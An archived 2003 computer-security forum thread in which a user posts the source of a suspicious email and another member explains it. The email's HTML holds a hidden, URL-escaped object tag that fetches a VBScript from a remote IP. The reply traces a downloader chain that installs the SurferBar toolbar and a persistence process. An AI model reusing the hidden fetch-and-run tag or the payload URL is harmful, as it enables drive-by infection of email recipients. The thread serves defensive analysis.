Weird mail trying top get "a.cgi", any ideas ?

Discussion in 'Computer Security' started by Maxime Ducharme, Sep 3, 2003.

  1. Hi,
    I received a suspicious email which seems to be an exploit
    of OE to infect people with a trojan or something like that.


    Here's how the email source look like (I removed SMTP IPs & received
    headers):

    =================== BEGIN SOURCE =================
    Message-ID: <[email protected]>
    From: "Lorna Roach" <>
    Reply-To: "Lorna Roach" <>
    To: <>, <>
    Subject: Hey
    Date: Wed, 03 Sep 03 22:41:51 GMT
    X-Mailer: AOL 7.0 for Windows US sub 118
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
    boundary="AF3E6...967056.7.08E03F7"
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Return-Path:


    --AF3E6...967056.7.08E03F7
    Content-Type: text/html;
    Content-Transfer-Encoding: quoted-printable

    <head>
    <div style=3D"display.none"><object data=3D"http://63.246.=
    %3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
    </head>
    <body>
    <p>Hey,</p>
    <p>How have you been?&nbsp; What have you been doing lately?</p>
    <p>Ive just been at home doing nothing :( bored at uni etc.</p>
    <p>Anyway's lets catch up soon,</p>
    <p>Luv,<br>You know who ;)</p>
    <p>&nbsp;</p>
    </body>
    </html>

    --AF3E6...967056.7.08E03F7--
    =================== END SOURCE =================


    This code tries to download this file :

    http://63.246.130.201/cgi-bin/a.cgi

    This host doesnt answer my pings and his tcp port 80 is stealthed.

    I didnt find anything on Google yet.

    Someone recognize a virus in this or I am targeted by someone ?

    I do not like the fact that the email is targeted at 2 specific address
    of our organisation.

    Thanks for any reply
     
    Maxime Ducharme, Sep 3, 2003
    #1
    1. Advertisements

  2. I saw my first of these last night and have had a couple more reports
    this morning...
    Close, yes...
    If you would not mind, I'd like to know the originating IP (or mail server).
    If' you'd rather not post it publicly, please send it to me via Email.

    "URL escaped" encoding of a URl to a file called a.cgi which is a VBScript that
    drops a small .EXE (named drg.exe) and runs it. drg.exe is a "downloader" that
    pulls down a copy of the SurferBar IE toolbar and registers it via regsvr32.

    In turn the toolbar drops another .EXE (winsvr32.exe) into "c:\program files"
    (that path is hard-coded) and runs it. This .EXE is a "guardian" that runs a
    10-second sleep loop making sure that its own auto-start and two of SurferBar's
    registry configuration settings are present. The SurferBar toolbar also makes
    a large nnumber of (pretty tastelessly named) shortcuts in your Start menu and
    in the "Programs" sub-menu thereunder...
    Yep -- that's what the above encoded URL decodes to...
    Yes -- it does seem rather dead now, but last night I could d/l that file and
    the SurferBar toolbar .DLL the downloader is programmed to grab. The main
    surferbar.com site (63.246.130.200) was pretty sad -- all the links were to
    some other site (kanoodle.com ??) and were dead, much as www.surferbar.com
    seems to be now... (Hopefully this means the hosting company has closed
    surferbar.com down...)
    Try Google Groups and search for "surferbar". There were a couple of dozen hits
    going back 2 or 3 days last night.
    AFAICT, it is not viral, but this "seed" Email seems to have been quite widely
    spammed.
     
    Nick FitzGerald, Sep 4, 2003
    #2
    1. Advertisements

  3. Maxime Ducharme

    Elson Mat Guest

    Elson Mat, Sep 4, 2003
    #3
  4. Maxime Ducharme

    Lord Shaolin Guest

    Lord Shaolin, Sep 4, 2003
    #4
  5. Thanks Nick, Elson & Lord for your answers
     
    Maxime Ducharme, Sep 4, 2003
    #5
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.